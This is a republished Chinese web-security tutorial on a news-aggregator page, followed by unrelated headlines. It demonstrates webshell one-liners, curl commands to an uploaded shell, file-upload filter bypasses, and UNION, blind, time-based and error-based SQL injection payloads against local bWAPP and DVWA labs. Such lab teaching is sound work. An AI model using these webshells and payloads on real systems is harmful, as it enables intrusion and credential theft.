首页 >资讯 > > 正文

天天快看:Web安全

来源:博客园 2023-05-31 22:13:30
Web安全工具HackBar

HackBar

Charset

Charset


(资料图片)

Cookie Hacker

Cookie Hacker

Proxy SwitchySharp

Proxy SwitchySharp

Wappalyzer

https://www.wappalyzer.com/

Wappalyzer

BurpSuite
BurpSuite是用于攻击Web应用程序的集成平台框架。它包含了许多web安全相关工具,也同时设计了接口,满足安全人员自行扩展功能的需求。
BurpSuite功能

Proxy:是一个拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人, 允许你拦截,查看,修改在两个方向上的原始数据流。

Intruder——是一个定制的高度可配置的工具,对web应用程序进行自动化攻击, 如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。

Repeater——是一个靠手动操作来补发单独的HTTP 请求,并分析应用程序响应的工具。

Sequencer——是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。

Decoder——是一个进行手动执行或对应用程序数据者智能解码编码的工具。

Comparer——是一个实用的工具,通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。

Mac下BurpSuite安装

https://portswigger.net/burp/communitydownload

BurpSuite启用代理

Google 配置代理

Mac 配置系统代理

Windows 10 设置系统代理

配置HTTPS

chrome://settings/security

文件上传漏洞

什么是文件上传漏洞

文件上传(File Upload)例如:用户上传附件、改头像、分享图片、简历投递等。 文件上传漏洞是开发者没有做充足验证(包括前端、后端)情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者WebShell等。

测试环境

bwapp

docker pull raesene/bwappdocker run -d -p 0.0.0.0:80:80 raesene/bwapp

访问:http://127.0.0.1:80/install.php

安装bwapp

注册账户

登录

文件上传

WebShell

PHP一句话木马

ASP一句话木马

<%execute(request("value"))%>

ASPX一句话木马

<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>

其他一句话木马

<%eval request("value")%> <%execute request("value")%> <%execute(request("value"))%>
编辑PHP木马文件并上传

eval

PHP4、PHP5、PHP7 eval ———— Evaluate a string as PHP code

Description

eval(string $code): mixed

制作PHP一句话木马

上传Shell

使用curl 连接shell

curl -d "hacker=echo getcwd();" http://127.0.0.1/images/shell.phpcurl -d "hacker=echo get_current_user();" http://127.0.0.1/images/shell.php

使用postman连接

使用中国菜刀

https://github.com/raddyfiy/caidao-official-version

上传绕过文件后缀绕过

修改文件后缀绕过

为啥后缀为php3可以被识别为php脚本

https://httpd.apache.org/docs/2.4/

docker exec -it `docker ps | grep bwapp | awk -F " " "{print $1}"` bashnetstat -anlpt | grep 80vim /etc/apache2/apache2.confcd /etc/apache2/mods-enabledvim php5.conf
前端验证绕过、.htaccess绕过、大小写绕过

Exploit Database 官方网址 Web Server漏洞

IIS 5.X/ 6.0解析漏洞

IIS在解析asp文件的时候,在IIS 5.X/ 6.0版本中会调用一个asp.dll动态链接库来解析我们要访问的文件资源时会触发这两种漏洞 逆向:使用IDA和F5插件逆向asp.dll就可以得到相关代码

漏洞1: 当创建.asp的文件目录的时候,在此目录下的任意文件,服务器都会解析为asp文件

www.xxx.com/xx.asp/xx.jgp 会被解析成asp文件

漏洞2:服务器默认不解析";"以后的内容

www.xxx.com/xx.asp;.jpg 会被解析成为asp文件
Nginx解析漏洞

在低版本Nginx中存在一个由PHP-CGI导致的文件解析漏洞。 PHP的配置文件中有一个关键的选项cgi.fix_pathinfo在本机中位于php.ini配置文件中,默认是开启的。 当URL中有不存的文件时,PHP就会默认向前解析。

访问:wwww.xxx.com/phpinfo.jpg/1.php当1.php不存在时就会解析phpinfo.jpg文件,但是按照PHP格式解析

Apache解析漏洞

Apache在1.x和2.x版本中存在解析漏洞: Apache从左至右开始判断后缀,跳过非可识别后缀,直到找到可识别后缀为止,然后将该可识别后缀进行解析。

当访问www.xxx.com/shell.php.text服务器会解析shell.php.text文件,但是按照PHP文件格式进行解析

前端验证绕过

漏洞利用:

使用BurpSuite抓包,然后修改内容后放行.

同Chrome禁止/删除js代码

.htaccess绕过

.htaccess文件(分布式配置文件)提供了一个方法,是的配置文件可以随文件夹不同而不同,其所防止的文件夹及所有子文件夹都会受此影响,其语法同apache主配置文件。

漏洞利用:

1、上传一个.htaccess文件,文件内容设置为AddType application/x-httpd-php .test将.text后缀文件解析为php文件类型 2、上传一句话木马文件,文件名设置为shell.test 3、在浏览器中访问shell.text即可执行一句话木马

大小写绕过

Window平台不区分大小写、Linux平台区分大小写 Linux+Apache 在系统启用加载speling模块,访问URL地址时就不区分大小写就可以正常访问页面

如: php改为pHp

Windows文件流特性绕过

什么是Windows文件流?

NTFS文件系统实现了多文件流特性,NTFS环境一个文件默认使用的是未命名的文件流,同时可创建其它命名的文件流,Windows资源管理器默认不显示出文件的命名文件流,这些命名的文件流在功能上和默认使用的未命名文件流一致,甚至可以用来启动程序。

我们来用Windows平台做一些测试:

echo 111 > test.txt:111.txt

echo test > test.txt

echo 222 > test.txt::$data

notepad 打开创建的文件流

利用这个漏洞进行绕过及webshell上传

%00截断绕过文件头检测绕过
cat test.php >> test.pngphp test.png
FuzzSQL注入MySQL简介SQL注入的危害

什么SQL注入

手工检测是否存在注入漏洞

and 1=1 及and 1=2 | and "1"= "1 及 and "1" = "2

-0

/

单引号 "无论是str类型还是int类型都会因为单引号个数不匹配而报错,页面返回错误,则存在SQL注入

GET注入

源码

使用order by 探测当前查询列数

根据源码中SQL分析,查询movies表所有列,movies表一共有6列

order by 10 猜解下可能是10列

order by 7

使用union探测

列出表、用户、数据库

union select 1,user(),database(),table_name,version(),6,7 from information_schema.tables where table_schema=database() --

爆出表字段名

union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name="users" --

获取系统账户密码

union select 1,id,login,password,email,6,7 from users --

尝试逆向密码

https://www.cmd5.com/

POST注入

使用burp suite抓包

探测是否存在注入

五种注入类型

布尔型注入

联合查询注入

基于时间延迟注入

报错型注入

可多语句查询注入

布尔型注入

and 1=1

判断表

and exists (select * from admin)

判断表列明

and exists (select admin from admin)

判断用户名长度

and (select len(admin) from admin)=5  如果返回正常说明管理员账户的长度为5

判断密码长度

and (select len(password) from admin)=32  猜解管理密码长度是否为32

通过判断ascii码来判断(ASCII码表逐字猜解)

如:用户名是:adminand (select top 1 asc(mid(database(),1,1)) from admin)>100and (select top 1 asc(mid(admin,1,1)) from admin)>100 返回正常说明大于,不正常说明不大于and (select top 1 asc(mid(admin,1,1)) from admin)>50  返回正常说明大于​and (select top 1 asc(mid(admin,1,1)) from admin)=97  返回正常说明等于97 97对应的字母为aand (select top 1 asc(mid(admin,2,1)) from admin)=100 返回正常说明等于100 97对应的字母为dand (select top 1 asc(mid(admin,3,1)) from admin)=109 返回正常说明等于109 97对应的字母为mand (select top 1 asc(mid(admin,4,1)) from admin)=105 返回正常说明等于105 97对应的字母为iand (select top 1 asc(mid(admin,5,1)) from admin)=110 返回正常说明等于110 97对应的字母为n​如:密码是21232f297a57a5a743894a0e4a801fc3and (select top 1 asc(mid(password,1,1)) from admin)=50and (select top 1 asc(mid(password,2,1)) from admin)=49
时间延迟注入

时间盲注是什么?

通过注入特定的语句,根据对页面请求的物理反馈,来判断是否注入成功,如:SQL语句中使用sleep()函数看加载网页的时间来判断注入点。

适用场景:通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。

select * from users where id = 1 and sleep(5)

当id=1 存在时,休眠5秒 当id=1 不存在时,直接返回

页面不会返回错误信息,不出输出union注入所查询出来的泄露的信息。类似搜索这类请求,Boolean注入也无能为力,因为搜索返回空也属于正常的,这时就得采用时间注入了,及判断请求响应的时间,但该类型注入获取的信息速度比较慢,请求次数比较多,纯手工非常复杂。

时间盲注常用函数

substr(a,b,c):从b位置开始,截取字符串a的c长度 count(): 计算总数 ascii():返回字符的ASCII码 length(): 返回字符串的长度 left(a,b): 从左往右截取字符串a的前b个字符 sleep(n): 将程序挂起n秒

http://192.168.26.129/sqli_15.php?title=abc" or sleep(3) -- &action=search

bool注入 猜解数据库名长度

http://192.168.26.129/sqli_15.php?title=World War z" and length(database()) > 1 and  sleep(3) -- &action=searchhttp://192.168.26.129/sqli_15.php?title=World War z" and length(database()) = 5 and  sleep(3) -- &action=search

爆出数据库名

and substr(database(),1,1)="b" and  sleep(3)and substr(database(),2,1)="w" and  sleep(3)and substr(database(),3,1)="a" and  sleep(3)and substr(database(),4,1)="p" and  sleep(3)and substr(database(),5,1)="p" and  sleep(3)

爆出数据库名(编码)

and ascii(substr(database(),1,1)=98) and  sleep(3)and ascii(substr(database(),2,1)=98) and  sleep(3)and ascii(substr(database(),3,1)=98) and  sleep(3)and ascii(substr(database(),4,1)=98) and  sleep(3)and ascii(substr(database(),5,1)=98) and  sleep(3)
报错型注入

如果页面能输出SQL报错信息,则可以从报错信息中获得想要的信息。 典型的就是利用group by的duplicate entry错误

多语句查询注入
?id=1;update t set name = "a" where id=1

能够执行多条查询语句,非常危险。

HTTP头注入

在burp suite中重放请求,测试是否存在注入 根据页面展示数据,猜测后端SQL语句可能是 insert into ... values("user-agent", "ip addr")

user-agent-test", (select database())); #

源码分析

报错注入

MySQL的报错注入主要是利用MySQL的一些逻辑漏洞,如BigInt大数溢出等,由此可以将MySQL报错注入主要分为以下几类:

BigInt数据类型溢出;

Xpath语法错误;

count() + rand() + group_by()导致重复;

空间数据类型函数错误

导致MySQl报错并显示出数据的函数:

foor函数;

extractvalue函数;

updatexml函数;

exp()函数;

docker pull docker pull sagikazarmark/dvwadocker run -d -p 0.0.0.0:81:80 docker pull sagikazarmark/dvwa

admin/password

http://192.168.26.129:81/vulnerabilities/sqli/?id=1" and extractvalue(1,concat(0x7e, (select @@version))) -- "&Submit=Submit#http://192.168.26.129:81/vulnerabilities/sqli/?id=1" and extractvalue(1, concat(0x7e,(select user()),0x7e,(select database()))) -- "&Submit=Submit#
WAF绕过混淆注入

混淆和绕过

普通的注入方式过于明显,很容易被检测。因此,需要改变攻击手法,绕过检测和过滤,即混淆和绕过。

使用union做测试,根据回显SQL分析, union关键字被过滤了

union关键字大小写转换,把union改为大写后,成功执行union语句

UNION select 1,database(),3,4,5,6,7 &action=go

大小绕过原理

MySQl执行SQL语句,对SQL指令是不区分大小写,对表名、库名敏感大小写,对表的列明大小写不敏感

||和&&绕过
上一篇:天天即时:湖南今年共发生涉校车交通事故114起,校车司机同责以上占比大 下一篇:最后一页
x
推荐阅读

天天快看:Web安全

2023-05-31

天天即时:湖南今年共发生涉校车交通事故114起,校车司机同责以上占比大

2023-05-31

“订单式”种植确保农户不愁销路 “钱袋子”越来越鼓

2023-05-31

当前关注:永福股份(300712.SZ):2022年度权益分派10派1元 股权登记日6月6日

2023-05-31

速讯:立讯精密:公司参与电子纸的下游应用环节,为客户提供下游产品的完整解决方案服务

2023-05-31

世界观点:中国星辰|英雄出征背后的故事

2023-05-31

涨停雷达:ST宇顺:控股股东拟变更为上海奉望 ST宇顺触及涨停|环球资讯

2023-05-31

2023年6月市场配置建议和金股组合-世界时快讯

2023-05-31

全球今日讯!超高清视频,看着真过瘾

2023-05-31

"财运大爆发!这4个属相下半年逆袭,摆脱钱包空空的窘境,满面红光!"

2023-05-31

这个地方在古人看来充满着诅咒,史上曾有三位皇帝先后在此殒命 世界观焦点

2023-05-31

天天速看:马斯克与曾毓群会面

2023-05-31

城乡居民医保断交后可再交吗?城镇居民医保断交了以后怎么交?

2023-05-31

做环评报告要多少钱一个 做环评报告要多少钱

2023-05-31

多元解纷机制变基层“末梢”为治理“前哨”|全球速讯

2023-05-31

在海南买房养老合适吗(外地人买海南的养老房)

2023-05-31

H&M撤离繁华商圈三里屯 快时尚为何“快”不起来了? 环球看点

2023-05-31

全球今亮点!世界气象组织发言人:冰冻圈变化已成为全球性问题

2023-05-31

天天亮点!【原】都反超小鹏蔚来了?宝马新能源卖爆了 还将推最便宜SUV!

2023-05-31

世界最资讯丨沪深股通|岭南股份5月30日获外资买入0.30%股份

2023-05-31

多地发布2022年平均工资 这些行业“钱景”好

2023-05-31

福州入选全国首批网络市场监管与服务示范区

2023-05-31

绝地求生密室在哪(绝地求生密室在哪里用)_全球通讯

2023-05-31

煮酒论车|从bZ3看丰田电动车的破局之道

2023-05-31

观速讯丨search for是什么意思啊_search for是什么意思

2023-05-31

每日热点:源组词和部首_源组词

2023-05-31

直流无刷电机的工作原理(有刷电机和无刷电机的优缺点) 当前视点

2023-05-31

宋元的都市和文化(关于宋元的都市和文化介绍)

2023-05-31

观点:不去学校还有学籍吗(不去学校报名学籍会不会被注销)

2023-05-31

当前焦点!华为nova Y61一款配备50MPAI三摄像头的时尚智能手机推出

2023-05-31

宁静淡雅的意思是什么_淡雅的意思是什么

2023-05-31

五谷股份(831893):拟10派0.4元,共派现265.98万元 世界聚焦

2023-05-30

今年广州荔枝价格如何?增城三月红田头收购价11-16元/千克 天天热闻

2023-05-30

豆瓣私信消息提醒怎么关

2023-05-30

豪鹏科技:拟不低于3410万元参与璞泰来子公司增资扩股-全球新要闻

2023-05-30

“北山一号”成功完成首次地下转弯

2023-05-30

石家庄经济职业学院怎么样了_石家庄经济职业学院怎么样

2023-05-30

申万宏源(06806)拟派发末期股息每10股0.3元

2023-05-30

今日热议:景嘉微:郭海辞去副总裁、财务总监职务

2023-05-30

东莞2.3亿元挂牌东部产业园片区1宗商住地 需配建6班幼儿园

2023-05-30

电脑椅什么牌子比较好(电脑椅什么牌子质量好)

2023-05-30

世界最新:山西“西电东送”特高压通道完善工程取得阶段性成果

2023-05-30

【时快讯】全球高端手机最新出货排名出炉:国产小米第一 华为第二

2023-05-30

qq空间复制相册(复制qq空间)

2023-05-30

环球速看:中铁房地产集团设计咨询公司进行简说分享探究建筑AI绘图

2023-05-30

肋软骨隆鼻后多久可以运动

2023-05-30

毛方园:大胆做科研 对自己不设限

2023-05-30

环球新消息丨南京城西交易中心广场膜结构雨棚安装项目招标公告

2023-05-30

环球精选!影音娱乐笔记本推荐(影音娱乐笔记本)

2023-05-30

【天天报资讯】亚托克斯皮肤哪个手感好_亚克托斯皮肤价格

2023-05-30

【环球播资讯】严重违反审慎经营规则 平安银行沈阳分行被罚130万元

2023-05-30

当前视点!前4个月排名前10家企业产煤7.8亿吨

2023-05-30

每日关注!广东中山企业组团进京“揽才”

2023-05-30

环球即时:满帮集团配合警方破获电诈案 平台提醒:这几种情形要警惕

2023-05-30

茅台冰淇淋一年卖出近千万杯 最高曾被炒到250元一杯

2023-05-30

全球快报:足球报:青岛海牛有保级压力,战南通康瓜恢复的可能性不大

2023-05-30

物联网编程最适合的编程语言是哪个?

2023-05-30

今日快看!Roguelike冒险新游《深蓝之旅》上架Steam!支持中文

2023-05-30

偶游wot盒子怎么登录|环球百事通

2023-05-30

通富微电等46股近五日获机构净买入

2023-05-30

天天实时:内容正在升级改造,请稍后再试!

2023-05-30

富春染织:今年是公司产能释放大年 公司每天产量已经增至250吨

2023-05-30

【读财报】19家民营银行财报透视:网商银行、华瑞银行、新网银行不良率居前三 世界热资讯

2023-05-30

郑州二七广场隧道西段匝道即将通车

2023-05-30

子女投胎不是随随便便的,不信你看!|环球快看点

2023-05-30

热点在线丨怎样去除口臭最快最有效_去除口臭方法

2023-05-30

中环控股(01735.HK)股份简称更改自6月2日起生效

2023-05-30

【天天聚看点】格局打开!比亚迪回应争议,相关专利将向所有同行分享

2023-05-30

大熊猫的进化发展史_大熊猫的演化历史 独家焦点

2023-05-30

世界热讯:win732位安装ie10_win7 ie8 32位下载

2023-05-30

周三(5月10日)COMEX黄金最新库存量数据 百事通

2023-05-30

14国“陈兵”俄罗斯边境 专家解读欧洲今年最大规模空中军演 每日短讯

2023-05-30

每日焦点!腾景科技:拟设控股子公司实施功能晶体材料与器件项目

2023-05-30

全球快资讯丨招商证券微软大语言模型服务采购项目项目终止

2023-05-30

4月武汉新房合计成交9311套

2023-05-30

世界最资讯丨什么是恐高症?(什么是恐高症 怎样克服恐高症)

2023-05-29

环球即时:长沙将全面实现商品房网签备案等业务线上办理

2023-05-29

天天最资讯丨消息称华夏幸福计划最早下月偿还部分人民币债券

2023-05-29

莱音珠宝铂金多少钱一克(2023年05月29日)参考价格

2023-05-29

深圳工会举行职工心理健康日主题活动_天天快播

2023-05-29

昇兴股份:公司旗下抖音运营服务属于智慧包装整体解决方案的一部分,主要由子公司昇兴云负责

2023-05-29

光的三原色是什么_原色是什么|热消息

2023-05-29

常州天宁区初中名单汇总(最新)-前沿热点

2023-05-29

当前关注:Rombauer Vineyards宣布为集体纳帕谷再次现场拍卖推出Epicurean Escape套餐

2023-05-29

环球讯息:交易性金融资产-公允价值变动属于什么科目_可供出售金融资产公允价值变动的原因

2023-05-29

企业所得税清算表怎么填

2023-05-29

每日热讯!爱要怎么说出口歌词歌词_爱要怎么说出口歌词

2023-05-29

【热闻】马来西亚羽毛球大师赛:山口茜夺冠

2023-05-29

【环球报资讯】模态逻辑关系(模态逻辑)

2023-05-29

全维重构 肆放新我 广汽本田全新雅阁郑州区域上市 售价17.98万起|热消息

2023-05-29

又是一年数博会:观察行业发展的风向标 展示科技产品的靓丽舞台-全球热议

2023-05-29

海南省将加密直飞柬埔寨航线 推动实施落地免签

2023-05-29

每日热讯!金力永磁:5月26日融资买入1676.96万元,融资融券余额5.52亿元

2023-05-29

封顶、合龙、直达……中国基础设施建设助力经济行稳致远-全球快讯

2023-05-29

天天看点:土耳其最高选举委员会:初步结果显示埃尔多安赢得总统选举

2023-05-29

快讯:石城政务业务“刷脸办”

2023-05-29

我国数字经济规模达50.2万亿元_每日观点

2023-05-29

互联网捧红的每个“县城小姨”背后,都有一个消失的大姨 世界独家

2023-05-29

当前视讯!玉米逆势,山东报价持续走高!5月28日玉米价格行情!

2023-05-29

全球观热点:海参的食用方法与做法_海参的食用方法

2023-05-29